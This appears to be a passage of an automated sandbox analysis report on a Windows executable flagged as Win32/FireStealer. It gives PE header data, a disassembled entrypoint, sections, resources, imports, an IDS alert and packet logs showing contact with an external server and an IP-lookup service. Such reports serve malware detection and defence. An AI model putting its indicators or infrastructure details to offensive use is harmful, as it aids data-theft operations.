                                                                                                                                          TLS Callbacks:
                                                                                                                                          CLR (.Net) Version:
                                                                                                                                          OS Version Major:4
                                                                                                                                          OS Version Minor:0
                                                                                                                                          File Version Major:4
                                                                                                                                          File Version Minor:0
                                                                                                                                          Subsystem Version Major:4
                                                                                                                                          Subsystem Version Minor:0
                                                                                                                                          Import Hash:26600adf486f72b556f917a64c8fd23f

                                                                                                                                          Entrypoint Preview

                                                                                                                                          Instruction
                                                                                                                                          push 00000060h
                                                                                                                                          push 0043A478h
                                                                                                                                          call 00007F8C48B70DE3h
                                                                                                                                          mov edi, 00000094h
                                                                                                                                          mov eax, edi
                                                                                                                                          call 00007F8C48B6F33Fh
                                                                                                                                          mov dword ptr [ebp-18h], esp
                                                                                                                                          mov esi, esp
                                                                                                                                          mov dword ptr [esi], edi
                                                                                                                                          push esi
                                                                                                                                          call dword ptr [0042F2B4h]
                                                                                                                                          mov ecx, dword ptr [esi+10h]
                                                                                                                                          mov dword ptr [0044B190h], ecx
                                                                                                                                          mov eax, dword ptr [esi+04h]
                                                                                                                                          mov dword ptr [0044B19Ch], eax
                                                                                                                                          mov edx, dword ptr [esi+08h]
                                                                                                                                          mov dword ptr [0044B1A0h], edx
                                                                                                                                          mov esi, dword ptr [esi+0Ch]
                                                                                                                                          and esi, 00007FFFh
                                                                                                                                          mov dword ptr [0044B194h], esi
                                                                                                                                          cmp ecx, 02h
                                                                                                                                          je 00007F8C48B6FCDEh
                                                                                                                                          or esi, 00008000h
                                                                                                                                          mov dword ptr [0044B194h], esi
                                                                                                                                          shl eax, 08h
                                                                                                                                          add eax, edx
                                                                                                                                          mov dword ptr [0044B198h], eax
                                                                                                                                          xor esi, esi
                                                                                                                                          push esi
                                                                                                                                          mov edi, dword ptr [0042F20Ch]
                                                                                                                                          call edi
                                                                                                                                          cmp word ptr [eax], 5A4Dh
                                                                                                                                          jne 00007F8C48B6FCF1h
                                                                                                                                          mov ecx, dword ptr [eax+3Ch]
                                                                                                                                          add ecx, eax
                                                                                                                                          cmp dword ptr [ecx], 00004550h
                                                                                                                                          jne 00007F8C48B6FCE4h
                                                                                                                                          movzx eax, word ptr [ecx+18h]
                                                                                                                                          cmp eax, 0000010Bh
                                                                                                                                          je 00007F8C48B6FCF1h
                                                                                                                                          cmp eax, 0000020Bh
                                                                                                                                          je 00007F8C48B6FCD7h
                                                                                                                                          mov dword ptr [ebp-1Ch], esi
                                                                                                                                          jmp 00007F8C48B6FCF9h
                                                                                                                                          cmp dword ptr [ecx+00000084h], 0Eh
                                                                                                                                          jbe 00007F8C48B6FCC4h
                                                                                                                                          xor eax, eax
                                                                                                                                          cmp dword ptr [ecx+000000F8h], esi
                                                                                                                                          jmp 00007F8C48B6FCE0h
                                                                                                                                          cmp dword ptr [ecx+74h], 0Eh
                                                                                                                                          jbe 00007F8C48B6FCB4h
                                                                                                                                          xor eax, eax
                                                                                                                                          cmp dword ptr [ecx+000000E8h], esi
                                                                                                                                          setne al
                                                                                                                                          mov dword ptr [ebp-1Ch], eax

                                                                                                                                          Rich Headers

                                                                                                                                          Programming Language:
                                                                                                                                          • [ASM] VS2002 (.NET) build 9466
                                                                                                                                          • [ C ] VS2002 (.NET) build 9466
                                                                                                                                          • [C++] VS2003 (.NET) build 3077
                                                                                                                                          • [C++] VS2002 (.NET) build 9466
                                                                                                                                          • [RES] VS2002 (.NET) build 9466
                                                                                                                                          • [LNK] VS2002 (.NET) build 9466

                                                                                                                                          Data Directories

                                                                                                                                          NameVirtual AddressVirtual Size Is in Section
                                                                                                                                          IMAGE_DIRECTORY_ENTRY_EXPORT0x00x0
                                                                                                                                          IMAGE_DIRECTORY_ENTRY_IMPORT0x3f9240x118.rdata
                                                                                                                                          IMAGE_DIRECTORY_ENTRY_RESOURCE0x4d0000x2f5f0.rsrc
                                                                                                                                          IMAGE_DIRECTORY_ENTRY_EXCEPTION0x00x0
                                                                                                                                          IMAGE_DIRECTORY_ENTRY_SECURITY0x00x0
                                                                                                                                          IMAGE_DIRECTORY_ENTRY_BASERELOC0x00x0
                                                                                                                                          IMAGE_DIRECTORY_ENTRY_DEBUG0x00x0
                                                                                                                                          IMAGE_DIRECTORY_ENTRY_COPYRIGHT0x00x0
                                                                                                                                          IMAGE_DIRECTORY_ENTRY_GLOBALPTR0x00x0
                                                                                                                                          IMAGE_DIRECTORY_ENTRY_TLS0x00x0
                                                                                                                                          IMAGE_DIRECTORY_ENTRY_LOAD_CONFIG0x00x0
                                                                                                                                          IMAGE_DIRECTORY_ENTRY_BOUND_IMPORT0x00x0
                                                                                                                                          IMAGE_DIRECTORY_ENTRY_IAT0x2f0000x594.rdata
                                                                                                                                          IMAGE_DIRECTORY_ENTRY_DELAY_IMPORT0x00x0
                                                                                                                                          IMAGE_DIRECTORY_ENTRY_COM_DESCRIPTOR0x00x0
                                                                                                                                          IMAGE_DIRECTORY_ENTRY_RESERVED0x00x0

                                                                                                                                          Sections

                                                                                                                                          NameVirtual AddressVirtual SizeRaw SizeMD5Xored PEZLIB ComplexityFile TypeEntropyCharacteristics
                                                                                                                                          .text0x10000x2db320x2e0007868e2f41e5b3ab908ac5a72a66f5953False0.6095076851222826data6.670624963209676IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE
                                                                                                                                          .rdata0x2f0000x126c60x13000efd458d4cde7206fd4c5482997a30ba9False0.4482421875data5.736665908168061IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ
                                                                                                                                          .data0x420000xa9f40x400007b79e131c84ddfb0842641915843ec1False0.4459228515625data5.072911159589167IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE
                                                                                                                                          .rsrc0x4d0000x2f5f00x300002686df77c23e2ca3144ababd1a5e1501False0.2823994954427083data4.484521144858898IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ
                                                                                                                                          )m&0x7d0000xc50000xc5000acab40631ef6f655b384348be6aac2b9False0.841724996034264data7.775469163423906IMAGE_SCN_MEM_READ

                                                                                                                                          Resources

                                                                                                                                          NameRVASizeTypeLanguageCountryZLIB Complexity
                                                                                                                                          JPG0x4f2b00x2b1e6PC bitmap, Windows 3.x format, 635 x 276 x 8, cbSize 176614, bits offset 1078ChineseChina0.27774128891254374
                                                                                                                                          RT_CURSOR0x7a4980x134Targa image data - RGB 64 x 65536 x 1 +32 "\001"ChineseChina0.4805194805194805
                                                                                                                                          RT_CURSOR0x7a5d00xb4Targa image data - Map 32 x 65536 x 1 +16 "\001"ChineseChina0.7
                                                                                                                                          RT_CURSOR0x7a6b00x134AmigaOS bitmap font "(", fc_YSize 4294967264, 5120 elements, 2nd "\377\360?\377\377\370\177\377\377\374\377\377\377\377\377\377\377\377\377\377\377\377\377\377\377\377\377\377\377\377\377\377\377\377\377\377\377\377\377\377\377\377\377\377", 3rdChineseChina0.36363636363636365
                                                                                                                                          RT_CURSOR0x7a8000x134Targa image data - RLE 64 x 65536 x 1 +32 "\001"ChineseChina0.35714285714285715
                                                                                                                                          RT_CURSOR0x7a9500x134dataChineseChina0.37337662337662336
                                                                                                                                          RT_CURSOR0x7aaa00x134dataChineseChina0.37662337662337664
                                                                                                                                          RT_CURSOR0x7abf00x134Targa image data 64 x 65536 x 1 +32 "\001"ChineseChina0.36688311688311687
                                                                                                                                          RT_CURSOR0x7ad400x134Targa image data 64 x 65536 x 1 +32 "\001"ChineseChina0.37662337662337664
                                                                                                                                          RT_CURSOR0x7ae900x134Targa image data - Mono - RLE 64 x 65536 x 1 +32 "\001"ChineseChina0.36688311688311687
                                                                                                                                          RT_CURSOR0x7afe00x134Targa image data - RGB - RLE 64 x 65536 x 1 +32 "\001"ChineseChina0.38636363636363635
                                                                                                                                          RT_CURSOR0x7b1300x134dataChineseChina0.44155844155844154
                                                                                                                                          RT_CURSOR0x7b2800x134dataChineseChina0.4155844155844156
                                                                                                                                          RT_CURSOR0x7b3d00x134AmigaOS bitmap font "(", fc_YSize 4294966847, 3840 elements, 2nd "\377?\374\377\377\300\003\377\377\300\003\377\377\340\007\377\377\360\017\377\377\370\037\377\377\374?\377\377\376\177\377\377\377\377\377\377\377\377\377\377\377\377\377", 3rdChineseChina0.5422077922077922
                                                                                                                                          RT_CURSOR0x7b5200x134dataChineseChina0.2662337662337662
                                                                                                                                          RT_CURSOR0x7b6700x134dataChineseChina0.2824675324675325
                                                                                                                                          RT_CURSOR0x7b7c00x134dataChineseChina0.3246753246753247
                                                                                                                                          RT_BITMAP0x7b9f80xb8Device independent bitmap graphic, 12 x 10 x 4, image size 80ChineseChina0.44565217391304346
                                                                                                                                          RT_BITMAP0x7bab00x144Device independent bitmap graphic, 33 x 11 x 4, image size 220ChineseChina0.37962962962962965
                                                                                                                                          RT_ICON0x4db700x8a8Device independent bitmap graphic, 32 x 64 x 8, image size 1024, 256 important colorsChineseChina0.6042418772563177
                                                                                                                                          RT_ICON0x4e4300x8a8Device independent bitmap graphic, 32 x 64 x 8, image size 1024, 256 important colorsChineseChina0.6042418772563177
                                                                                                                                          RT_DIALOG0x4ecf00x23edataChineseChina0.5174216027874564
                                                                                                                                          RT_DIALOG0x4ef300x94dataChineseChina0.6959459459459459
                                                                                                                                          RT_DIALOG0x7b9100xe2dataChineseChina0.6637168141592921
                                                                                                                                          RT_STRING0x7bbf80x46dataChineseChina0.6857142857142857
                                                                                                                                          RT_STRING0x7bc400x54dataChineseChina0.8571428571428571
                                                                                                                                          RT_STRING0x7bc980x2cdataChineseChina0.5909090909090909
                                                                                                                                          RT_STRING0x7bcc80x74dataChineseChina0.8448275862068966
                                                                                                                                          RT_STRING0x7bd400x1d0dataChineseChina0.8060344827586207
                                                                                                                                          RT_STRING0x7c0880x164dataChineseChina0.48314606741573035
                                                                                                                                          RT_STRING0x7bf500x132dataChineseChina0.6405228758169934
                                                                                                                                          RT_STRING0x7c5700x50dataChineseChina0.725
                                                                                                                                          RT_STRING0x7bf100x40dataChineseChina0.65625
                                                                                                                                          RT_STRING0x7c4d80x6adataChineseChina0.7452830188679245
                                                                                                                                          RT_STRING0x7c1f00x1d6dataChineseChina0.6723404255319149
                                                                                                                                          RT_STRING0x7c3c80x110dataChineseChina0.625
                                                                                                                                          RT_STRING0x7c5480x24dataChineseChina0.4444444444444444
                                                                                                                                          RT_STRING0x7c5c00x30dataChineseChina0.625
                                                                                                                                          RT_GROUP_CURSOR0x7a6880x22Lotus unknown worksheet or configuration, revision 0x2ChineseChina1.0294117647058822
                                                                                                                                          RT_GROUP_CURSOR0x7ae780x14Lotus unknown worksheet or configuration, revision 0x1ChineseChina1.3
                                                                                                                                          RT_GROUP_CURSOR0x7a7e80x14Lotus unknown worksheet or configuration, revision 0x1ChineseChina1.3
                                                                                                                                          RT_GROUP_CURSOR0x7ad280x14Lotus unknown worksheet or configuration, revision 0x1ChineseChina1.3
                                                                                                                                          RT_GROUP_CURSOR0x7abd80x14Lotus unknown worksheet or configuration, revision 0x1ChineseChina1.3
                                                                                                                                          RT_GROUP_CURSOR0x7b5080x14Lotus unknown worksheet or configuration, revision 0x1ChineseChina1.3
                                                                                                                                          RT_GROUP_CURSOR0x7aa880x14Lotus unknown worksheet or configuration, revision 0x1ChineseChina1.3
                                                                                                                                          RT_GROUP_CURSOR0x7b1180x14Lotus unknown worksheet or configuration, revision 0x1ChineseChina1.3
                                                                                                                                          RT_GROUP_CURSOR0x7a9380x14Lotus unknown worksheet or configuration, revision 0x1ChineseChina1.3
                                                                                                                                          RT_GROUP_CURSOR0x7afc80x14Lotus unknown worksheet or configuration, revision 0x1ChineseChina1.3
                                                                                                                                          RT_GROUP_CURSOR0x7b2680x14Lotus unknown worksheet or configuration, revision 0x1ChineseChina1.3
                                                                                                                                          RT_GROUP_CURSOR0x7b3b80x14Lotus unknown worksheet or configuration, revision 0x1ChineseChina1.3
                                                                                                                                          RT_GROUP_CURSOR0x7b6580x14Lotus unknown worksheet or configuration, revision 0x1ChineseChina1.3
                                                                                                                                          RT_GROUP_CURSOR0x7b7a80x14Lotus unknown worksheet or configuration, revision 0x1ChineseChina1.3
                                                                                                                                          RT_GROUP_CURSOR0x7b8f80x14Lotus unknown worksheet or configuration, revision 0x1ChineseChina1.3
                                                                                                                                          RT_GROUP_ICON0x4e4180x14dataChineseChina1.15
                                                                                                                                          RT_GROUP_ICON0x4ecd80x14dataChineseChina1.25
                                                                                                                                          RT_VERSION0x4efc80x2e8dataChineseChina0.5631720430107527

                                                                                                                                          Imports

                                                                                                                                          DLLImport
                                                                                                                                          KERNEL32.dllLockFile, UnlockFile, SetEndOfFile, DuplicateHandle, FindClose, FindFirstFileA, GetFullPathNameA, GetCPInfo, GetOEMCP, FileTimeToSystemTime, SetErrorMode, FileTimeToLocalFileTime, GetFileAttributesA, GetFileTime, GetTickCount, HeapAlloc, HeapFree, RtlUnwind, GetStartupInfoA, GetCommandLineA, RaiseException, GetSystemTimeAsFileTime, ExitProcess, TerminateProcess, HeapReAlloc, HeapSize, FlushFileBuffers, HeapCreate, VirtualFree, VirtualAlloc, IsBadWritePtr, GetStdHandle, UnhandledExceptionFilter, FreeEnvironmentStringsA, GetEnvironmentStrings, FreeEnvironmentStringsW, GetEnvironmentStringsW, SetHandleCount, GetFileType, SetUnhandledExceptionFilter, GetStringTypeA, GetStringTypeW, GetCurrentProcessId, LCMapStringA, LCMapStringW, GetTimeZoneInformation, IsBadReadPtr, IsBadCodePtr, VirtualProtect, GetSystemInfo, VirtualQuery, SetStdHandle, SetEnvironmentVariableA, SetFilePointer, GlobalFlags, WritePrivateProfileStringA, TlsFree, DeleteCriticalSection, LocalReAlloc, TlsSetValue, TlsAlloc, InitializeCriticalSection, TlsGetValue, EnterCriticalSection, GlobalHandle, GlobalReAlloc, LeaveCriticalSection, LocalAlloc, GlobalGetAtomNameA, GlobalFindAtomA, lstrcatA, lstrcmpW, GlobalAddAtomA, GetCurrentThread, GetCurrentThreadId, GlobalDeleteAtom, lstrcmpA, ConvertDefaultLocale, EnumResourceLanguagesA, lstrcpyA, SetLastError, GlobalFree, MulDiv, GlobalAlloc, GlobalLock, GlobalUnlock, GetModuleHandleA, GetProcAddress, FormatMessageA, LocalFree, CopyFileA, GetCurrentDirectoryA, FreeResource, OpenFile, GetCurrentProcess, SetPriorityClass, lstrcpynA, DeviceIoControl, ReadFile, GetFileSize, GetLastError, QueryPerformanceCounter, QueryPerformanceFrequency, GetSystemDirectoryA, CreateFileA, WriteFile, CloseHandle, DeleteFileA, GetModuleFileNameA, LoadLibraryA, FreeLibrary, GetVolumeInformationA, OutputDebugStringA, DebugBreak, InterlockedIncrement, InterlockedDecrement, FindResourceA, LoadResource, LockResource, SizeofResource, lstrlenA, lstrcmpiA, CompareStringW, lstrlenW, CompareStringA, GetVersion, WideCharToMultiByte, MultiByteToWideChar, GetVersionExA, GetThreadLocale, GetLocaleInfoA, GetACP, HeapDestroy, InterlockedExchange
                                                                                                                                          USER32.dllInvalidateRgn, SetCapture, ReleaseCapture, GetNextDlgGroupItem, MessageBeep, RegisterClipboardFormatA, PostThreadMessageA, GetForegroundWindow, GetTopWindow, UnhookWindowsHookEx, GetMessagePos, MapWindowPoints, SetForegroundWindow, UpdateWindow, GetMenu, GetSysColor, AdjustWindowRectEx, EqualRect, GetClassInfoA, RegisterClassA, UnregisterClassA, GetDlgCtrlID, DefWindowProcA, CallWindowProcA, SetWindowLongA, OffsetRect, IntersectRect, SystemParametersInfoA, GetWindowPlacement, GetWindowRect, CopyRect, PtInRect, GetWindow, SetWindowContextHelpId, MapDialogRect, SetWindowPos, GetDesktopWindow, SetActiveWindow, EndPaint, DestroyWindow, IsWindow, InvalidateRect, GetNextDlgTabItem, EndDialog, SetMenuItemBitmaps, GetFocus, ModifyMenuA, EnableMenuItem, CheckMenuItem, GetMenuCheckMarkDimensions, LoadBitmapA, SetWindowsHookExA, CallNextHookEx, GetMessageA, TranslateMessage, DispatchMessageA, GetActiveWindow, IsWindowVisible, GetKeyState, PeekMessageA, GetCursorPos, ValidateRect, GetParent, GetWindowLongA, GetLastActivePopup, IsWindowEnabled, SetCursor, PostMessageA, PostQuitMessage, wsprintfA, GetMenuState, GetMenuItemID, GetMenuItemCount, CharLowerA, CharUpperA, BeginPaint, GetWindowDC, ReleaseDC, GetDC, ClientToScreen, GetSubMenu, MessageBoxA, CharNextA, wvsprintfA, GetSystemMetrics, LoadIconA, EnableWindow, GetClientRect, IsIconic, GetSystemMenu, SendMessageA, AppendMenuA, CopyAcceleratorTableA, SetRect, IsRectEmpty, DrawIcon, LoadCursorA, GetDlgItem, GetSysColorBrush, GrayStringA, DrawTextExA, DrawTextA, TabbedTextOutA, DestroyMenu, ShowWindow, MoveWindow, SetWindowTextA, IsDialogMessageA, RegisterWindowMessageA, WinHelpA, GetCapture, CreateWindowExA, GetClassLongA, GetClassInfoExA, GetClassNameA, SetPropA, GetPropA, RemovePropA, SendDlgItemMessageA, SetFocus, IsChild, GetWindowTextLengthA, CreateDialogIndirectParamA, GetWindowTextA, GetMessageTime
                                                                                                                                          GDI32.dllSetMapMode, DeleteObject, GetViewportExtEx, GetWindowExtEx, PtVisible, RectVisible, TextOutA, Escape, SelectObject, SetViewportOrgEx, OffsetViewportOrgEx, SetViewportExtEx, ScaleViewportExtEx, SetWindowExtEx, ScaleWindowExtEx, ExtSelectClipRgn, DeleteDC, GetStockObject, GetBkColor, GetTextColor, CreateRectRgnIndirect, GetRgnBox, GetMapMode, RestoreDC, SaveDC, ExtTextOutA, GetObjectA, SetBkColor, SetTextColor, GetClipBox, CreateBitmap, GetDeviceCaps
                                                                                                                                          comdlg32.dllGetFileTitleA
                                                                                                                                          WINSPOOL.DRVClosePrinter, DocumentPropertiesA, OpenPrinterA
                                                                                                                                          ADVAPI32.dllRegEnumKeyA, RegSetValueExA, RegCreateKeyExA, RegQueryValueA, RegCloseKey, RegDeleteKeyA, RegOpenKeyExA, RegQueryValueExA, RegOpenKeyA
                                                                                                                                          COMCTL32.dll
                                                                                                                                          SHLWAPI.dllPathFindExtensionA, PathFindFileNameA, PathStripToRootA, PathIsUNCA
                                                                                                                                          oledlg.dll
                                                                                                                                          ole32.dllCreateILockBytesOnHGlobal, StgCreateDocfileOnILockBytes, StgOpenStorageOnILockBytes, CoGetClassObject, CLSIDFromString, CLSIDFromProgID, CoTaskMemAlloc, OleInitialize, OleUninitialize, CoTaskMemFree, CoCreateInstance, CoSetProxyBlanket, CoInitialize, CoUninitialize, CoRevokeClassObject, OleIsCurrentClipboard, OleFlushClipboard, CoFreeUnusedLibraries, CoRegisterMessageFilter
                                                                                                                                          OLEAUT32.dllVariantInit, SysAllocStringLen, VariantClear, VariantChangeType, SysStringLen, SysAllocStringByteLen, OleCreateFontIndirect, SystemTimeToVariantTime, SafeArrayDestroy, VariantCopy, SysAllocString, SysFreeString
                                                                                                                                          iphlpapi.dllGetAdaptersInfo
                                                                                                                                          OLEACC.dllLresultFromObject, CreateStdAccessibleObject

                                                                                                                                          Possible Origin

                                                                                                                                          Language of compilation systemCountry where language is spokenMap
                                                                                                                                          ChineseChina

                                                                                                                                          Network Behavior

                                                                                                                                          Snort IDS Alerts

                                                                                                                                          TimestampProtocolSIDMessageSource PortDest PortSource IPDest IP
                                                                                                                                          05/05/24-00:24:50.450010TCP2051909ET TROJAN Win32/FireStealer Related Server Response8049789144.208.127.230192.168.11.20

                                                                                                                                          Network Port Distribution

                                                                                                                                          TCP Packets

                                                                                                                                          TimestampSource PortDest PortSource IPDest IP
                                                                                                                                          May 5, 2024 00:24:47.904021978 CEST49788443192.168.11.20172.67.74.152
                                                                                                                                          May 5, 2024 00:24:47.904131889 CEST44349788172.67.74.152192.168.11.20
                                                                                                                                          May 5, 2024 00:24:47.904324055 CEST49788443192.168.11.20172.67.74.152
                                                                                                                                          May 5, 2024 00:24:47.906574965 CEST49788443192.168.11.20172.67.74.152
                                                                                                                                          May 5, 2024 00:24:47.906646967 CEST44349788172.67.74.152192.168.11.20
                                                                                                                                          May 5, 2024 00:24:48.118782997 CEST44349788172.67.74.152192.168.11.20
                                                                                                                                          May 5, 2024 00:24:48.119072914 CEST49788443192.168.11.20172.67.74.152
                                                                                                                                          May 5, 2024 00:24:48.120646954 CEST49788443192.168.11.20172.67.74.152
                                                                                                                                          May 5, 2024 00:24:48.120656013 CEST44349788172.67.74.152192.168.11.20
                                                                                                                                          May 5, 2024 00:24:48.120851994 CEST44349788172.67.74.152192.168.11.20
                                                                                                                                          May 5, 2024 00:24:48.152481079 CEST49788443192.168.11.20172.67.74.152
                                                                                                                                          May 5, 2024 00:24:48.196245909 CEST44349788172.67.74.152192.168.11.20
                                                                                                                                          May 5, 2024 00:24:48.459268093 CEST44349788172.67.74.152192.168.11.20
                                                                                                                                          May 5, 2024 00:24:48.459501028 CEST44349788172.67.74.152192.168.11.20
                                                                                                                                          May 5, 2024 00:24:48.459741116 CEST49788443192.168.11.20172.67.74.152
                                                                                                                                          May 5, 2024 00:24:48.460419893 CEST49788443192.168.11.20172.67.74.152
                                                                                                                                          May 5, 2024 00:24:48.460481882 CEST44349788172.67.74.152192.168.11.20
                                                                                                                                          May 5, 2024 00:24:48.460628033 CEST49788443192.168.11.20172.67.74.152
                                                                                                                                          May 5, 2024 00:24:48.460686922 CEST44349788172.67.74.152192.168.11.20
                                                                                                                                          May 5, 2024 00:24:50.109848976 CEST4978980192.168.11.20144.208.127.230
                                                                                                                                          May 5, 2024 00:24:50.215768099 CEST8049789144.208.127.230192.168.11.20
                                                                                                                                          May 5, 2024 00:24:50.216002941 CEST4978980192.168.11.20144.208.127.230
                                                                                                                                          May 5, 2024 00:24:50.216104031 CEST4978980192.168.11.20144.208.127.230
                                                                                                                                          May 5, 2024 00:24:50.216152906 CEST4978980192.168.11.20144.208.127.230
                                                                                                                                          May 5, 2024 00:24:50.320934057 CEST8049789144.208.127.230192.168.11.20
                                                                                                                                          May 5, 2024 00:24:50.320976019 CEST8049789144.208.127.230192.168.11.20
                                                                                                                                          May 5, 2024 00:24:50.450010061 CEST8049789144.208.127.230192.168.11.20
                                                                                                                                          May 5, 2024 00:24:50.450088978 CEST8049789144.208.127.230192.168.11.20
                                                                                                                                          May 5, 2024 00:24:50.450146914 CEST8049789144.208.127.230192.168.11.20
                                                                                                                                          May 5, 2024 00:24:50.450248957 CEST8049789144.208.127.230192.168.11.20
                                                                                                                                          May 5, 2024 00:24:50.450306892 CEST8049789144.208.127.230192.168.11.20
                                                                                                                                          May 5, 2024 00:24:50.450361967 CEST8049789144.208.127.230192.168.11.20
                                                                                                                                          May 5, 2024 00:24:50.450412035 CEST8049789144.208.127.230192.168.11.20
                                                                                                                                          May 5, 2024 00:24:50.450428009 CEST4978980192.168.11.20144.208.127.230
                                                                                                                                          May 5, 2024 00:24:50.450566053 CEST4978980192.168.11.20144.208.127.230
                                                                                                                                          May 5, 2024 00:24:50.502199888 CEST4978980192.168.11.20144.208.127.230
                                                                                                                                          May 5, 2024 00:24:50.615658998 CEST4978980192.168.11.20144.208.127.230
                                                                                                                                          May 5, 2024 00:24:50.615658998 CEST4978980192.168.11.20144.208.127.230
                                                                                                                                          May 5, 2024 00:24:50.720161915 CEST8049789144.208.127.230192.168.11.20
                                                                                                                                          May 5, 2024 00:24:50.720295906 CEST8049789144.208.127.230192.168.11.20
                                                                                                                                          May 5, 2024 00:24:50.746968031 CEST8049789144.208.127.230192.168.11.20
                                                                                                                                          May 5, 2024 00:24:50.784807920 CEST4978980192.168.11.20144.208.127.230
                                                                                                                                          May 5, 2024 00:24:50.784807920 CEST4978980192.168.11.20144.208.127.230
                                                                                                                                          May 5, 2024 00:24:50.889528036 CEST8049789144.208.127.230192.168.11.20
                                                                                                                                          May 5, 2024 00:24:50.913850069 CEST8049789144.208.127.230192.168.11.20
                                                                                                                                          May 5, 2024 00:24:50.955168009 CEST4978980192.168.11.20144.208.127.230
                                                                                                                                          May 5, 2024 00:24:50.960611105 CEST4978980192.168.11.20144.208.127.230
                                                                                                                                          May 5, 2024 00:24:50.960611105 CEST4978980192.168.11.20144.208.127.230
                                                                                                                                          May 5, 2024 00:24:51.064706087 CEST8049789144.208.127.230192.168.11.20
                                                                                                                                          May 5, 2024 00:24:51.089246988 CEST8049789144.208.127.230192.168.11.20
                                                                                                                                          May 5, 2024 00:24:51.138124943 CEST4978980192.168.11.20144.208.127.230
                                                                                                                                          May 5, 2024 00:24:51.138124943 CEST4978980192.168.11.20144.208.127.230
                                                                                                                                          May 5, 2024 00:24:51.242675066 CEST8049789144.208.127.230192.168.11.20
                                                                                                                                          May 5, 2024 00:24:51.273591042 CEST8049789144.208.127.230192.168.11.20
                                                                                                                                          May 5, 2024 00:24:51.314446926 CEST4978980192.168.11.20144.208.127.230
                                                                                                                                          May 5, 2024 00:24:51.344860077 CEST4978980192.168.11.20144.208.127.230
                                                                                                                                          May 5, 2024 00:24:51.344860077 CEST4978980192.168.11.20144.208.127.230
                                                                                                                                          May 5, 2024 00:24:51.449444056 CEST8049789144.208.127.230192.168.11.20
                                                                                                                                          May 5, 2024 00:24:51.474955082 CEST8049789144.208.127.230192.168.11.20
                                                                                                                                          May 5, 2024 00:24:51.517565966 CEST4978980192.168.11.20144.208.127.230
                                                                                                                                          May 5, 2024 00:24:51.581295013 CEST4978980192.168.11.20144.208.127.230
                                                                                                                                          May 5, 2024 00:24:51.581295013 CEST4978980192.168.11.20144.208.127.230
                                                                                                                                          May 5, 2024 00:24:51.685782909 CEST8049789144.208.127.230192.168.11.20
                                                                                                                                          May 5, 2024 00:24:51.720448017 CEST8049789144.208.127.230192.168.11.20
                                                                                                                                          May 5, 2024 00:24:51.754550934 CEST4978980192.168.11.20144.208.127.230
                                                                                                                                          May 5, 2024 00:24:51.754550934 CEST4978980192.168.11.20144.208.127.230
                                                                                                                                          May 5, 2024 00:24:51.859148026 CEST8049789144.208.127.230192.168.11.20
                                                                                                                                          May 5, 2024 00:24:51.886817932 CEST8049789144.208.127.230192.168.11.20
                                                                                                                                          May 5, 2024 00:24:51.939325094 CEST4978980192.168.11.20144.208.127.230
                                                                                                                                          May 5, 2024 00:24:51.993621111 CEST4978980192.168.11.20144.208.127.230
                                                                                                                                          May 5, 2024 00:24:51.993621111 CEST4978980192.168.11.20144.208.127.230
                                                                                                                                          May 5, 2024 00:24:52.098404884 CEST8049789144.208.127.230192.168.11.20
                                                                                                                                          May 5, 2024 00:24:52.130491972 CEST8049789144.208.127.230192.168.11.20
                                                                                                                                          May 5, 2024 00:24:52.173640966 CEST4978980192.168.11.20144.208.127.230
                                                                                                                                          May 5, 2024 00:24:52.209886074 CEST4978980192.168.11.20144.208.127.230
                                                                                                                                          May 5, 2024 00:24:52.209886074 CEST4978980192.168.11.20144.208.127.230
                                                                                                                                          May 5, 2024 00:24:52.314246893 CEST8049789144.208.127.230192.168.11.20
                                                                                                                                          May 5, 2024 00:24:52.350059032 CEST8049789144.208.127.230192.168.11.20
                                                                                                                                          May 5, 2024 00:24:52.392358065 CEST4978980192.168.11.20144.208.127.230
                                                                                                                                          May 5, 2024 00:24:52.440471888 CEST4978980192.168.11.20144.208.127.230
                                                                                                                                          May 5, 2024 00:24:52.440471888 CEST4978980192.168.11.20144.208.127.230
                                                                                                                                          May 5, 2024 00:24:52.545001030 CEST8049789144.208.127.230192.168.11.20
                                                                                                                                          May 5, 2024 00:24:52.572115898 CEST8049789144.208.127.230192.168.11.20
                                                                                                                                          May 5, 2024 00:24:52.626641989 CEST4978980192.168.11.20144.208.127.230
                                                                                                                                          May 5, 2024 00:24:52.687793016 CEST4978980192.168.11.20144.208.127.230
                                                                                                                                          May 5, 2024 00:24:52.687793016 CEST4978980192.168.11.20144.208.127.230
                                                                                                                                          May 5, 2024 00:24:52.792337894 CEST8049789144.208.127.230192.168.11.20
                                                                                                                                          May 5, 2024 00:24:52.820131063 CEST8049789144.208.127.230192.168.11.20
                                                                                                                                          May 5, 2024 00:24:52.861021996 CEST4978980192.168.11.20144.208.127.230
                                                                                                                                          May 5, 2024 00:24:52.944320917 CEST4978980192.168.11.20144.208.127.230
                                                                                                                                          May 5, 2024 00:24:52.944320917 CEST4978980192.168.11.20144.208.127.230
                                                                                                                                          May 5, 2024 00:24:53.049401999 CEST8049789144.208.127.230192.168.11.20
                                                                                                                                          May 5, 2024 00:24:53.075536013 CEST8049789144.208.127.230192.168.11.20
                                                                                                                                          May 5, 2024 00:24:53.126554966 CEST4978980192.168.11.20144.208.127.230
                                                                                                                                          May 5, 2024 00:24:53.186395884 CEST4978980192.168.11.20144.208.127.230
                                                                                                                                          May 5, 2024 00:24:53.186395884 CEST4978980192.168.11.20144.208.127.230
                                                                                                                                          May 5, 2024 00:24:53.291074038 CEST8049789144.208.127.230192.168.11.20
                                                                                                                                          May 5, 2024 00:24:53.317679882 CEST8049789144.208.127.230192.168.11.20
                                                                                                                                          May 5, 2024 00:24:53.360930920 CEST4978980192.168.11.20144.208.127.230
                                                                                                                                          May 5, 2024 00:24:53.392790079 CEST4978980192.168.11.20144.208.127.230

                                                                                                                                          UDP Packets

                                                                                                                                          TimestampSource PortDest PortSource IPDest IP
                                                                                                                                          May 5, 2024 00:24:47.800074100 CEST5476553192.168.11.201.1.1.1
                                                                                                                                          May 5, 2024 00:24:47.899873972 CEST53547651.1.1.1192.168.11.20

                                                                                                                                          DNS Queries

                                                                                                                                          TimestampSource IPDest IPTrans IDOP CodeNameTypeClassDNS over HTTPS
                                                                                                                                          May 5, 2024 00:24:47.800074100 CEST192.168.11.201.1.1.10x3613Standard query (0)api.ipify.orgA (IP address)IN (0x0001)false

                                                                                                                                          DNS Answers

